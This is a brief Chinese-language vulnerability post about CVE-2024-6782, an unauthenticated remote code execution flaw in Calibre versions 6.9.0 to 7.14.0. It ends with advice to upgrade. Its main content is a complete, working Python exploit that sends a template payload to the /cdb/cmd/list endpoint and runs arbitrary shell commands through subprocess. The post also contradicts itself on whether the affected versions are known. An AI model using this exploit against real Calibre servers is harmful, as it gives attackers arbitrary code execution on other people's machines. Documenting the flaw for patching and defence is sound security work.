漏洞概述
CVE-2024-6782是一个影响Calibre软件的远程代码执行漏洞。Calibre是一款广泛使用的电子书管理工具,该漏洞可能允许攻击者在受影响的系统上执行任意代码,从而可能导致数据泄露、系统控制或其他恶意行为。
漏洞影响
该漏洞主要影响Calibre的特定版本,具体版本号尚未完全公开。受影响的用户可能包括使用Calibre进行电子书管理和转换的个人用户和企业用户。
影响版本
Calibre 6.9.0 ~ 7.14.0 中不当的访问控制允许未经身份验证的攻击者实现远程代码执行。
poc
#! /usr/bin/env python3
# PoC for: CVE-2024-6782
# Description: Unauthenticated remote code execution in 6.9.0 <= calibre <= 7.14.0
import json
import sys
import requests
_target = "http://localhost:8080"
def exploit(cmd):
r = requests.post(
f"{_target}/cdb/cmd/list",
headers={"Content-Type": "application/json"},
json=[
["template"],
"", # sortby: leave empty
"", # ascending: leave empty
"", # search_text: leave empty, set to all
1, # limit results
f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()", # payload
],
)
try:
print(list(r.json()["result"]["data"]["template"].values())[0])
except Exception as e:
print(r.text)
if __name__ == "__main__":
exploit("whoami")
漏洞修复
Calibre的开发团队已经发布了安全更新来修复该漏洞。建议所有用户立即更新到最新版本以确保系统安全。更新可以通过Calibre的自动更新功能或从官方网站手动下载最新版本进行安装。

被折叠的 条评论
为什么被折叠?



